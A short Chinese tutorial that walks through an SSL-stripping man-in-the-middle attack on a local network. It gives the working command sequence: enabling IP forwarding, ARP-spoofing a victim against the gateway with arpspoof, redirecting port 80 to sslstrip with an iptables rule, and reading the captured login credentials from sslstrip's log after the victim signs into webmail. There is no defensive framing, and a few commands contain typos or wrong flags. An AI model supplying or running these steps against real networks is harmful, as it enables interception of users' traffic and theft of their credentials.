赞
踩
中间人攻击(Man-in-the-Middle Attack, MITM),是指攻击者跟受害者分别建立独立连接的一种入侵式攻击。最常出现于主机系统之间。
它入侵了将用户从非安全的网页连接到安全的网页系统。这样攻击者可以窃取那些连接到安全Web服务器的用户数据。
SSL会话劫持,一种中间人攻击的形式。网络攻击者代理的是来自用户的HTTPS请求,并不是可以被拦截和篡改的通过HTTP发送的形式。SSL strip 可以将这种攻击自动化,允许第三方拦截到安全的站点的数据连接。时至今日,SSL会话劫持任然是广为使用。
初步使用只需要用到一个网卡接口。可以通过以下的命令来查看有几个网卡。
ifconfig|grep "eth"
如果启动了不止一个网卡,则关掉一个。示例关掉eth0
ifdown eth0
现在我们需要两部分的信息。目标的IP地址和自己的默认网关。
route -n|grep 'UG'|awk '{print $2}'
在开始从SSL会话中收集注入用户凭据一类的信息之前,需要先运行我们重定向网络请求工具。此外,需要重定向攻击主机中抓取请求,这样才能将用户数据包发给SSL strip。
先要在Iptables和Arpspoof工具中启用IP转发的功能。
echo 1 >/proc/sys/net/ipv4/ip_forward
为了避免让所有攻击主机对整个网络发起ARP地址洪水引起注意。在实际攻击场所中,理想情况下都是针对整个二段网络运行arpspoof,同时可以选择利用抓包和嗅探工具来进一步判定受害者的IP地址。命令是:
- arpspoof -i eth0 -t victimip default_gateway_ip
- 举例:arppoof -i eth0 -t 10.0.1.240 10.0.1.1
不建议把该进程挂在后台运行。
这一步的主要意义是攻击者抓取TCP80端口的数据,将其重定向到SSL strip的监听端口。
举例:把 80—>10000
iptables -t nat -A PREROUTING -p tcp --destination 80 -j REDIRECT --to 10000
如果想禁用 PREROUTNIG规则,可以将 -A替换成-D清楚规则。
- 清空: iptables -nat -F
- 检查: iptables -nat -L
在新打开的终端窗口启动sslstrip,运行。
sslstrip -l 10000
在目标主机上访问在线邮件服务,并登录。
另外再打开一个终端窗口,输入
tail -n 50 -f sslstrip.log
这样就可以看到SSL strip攻击的结果了。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。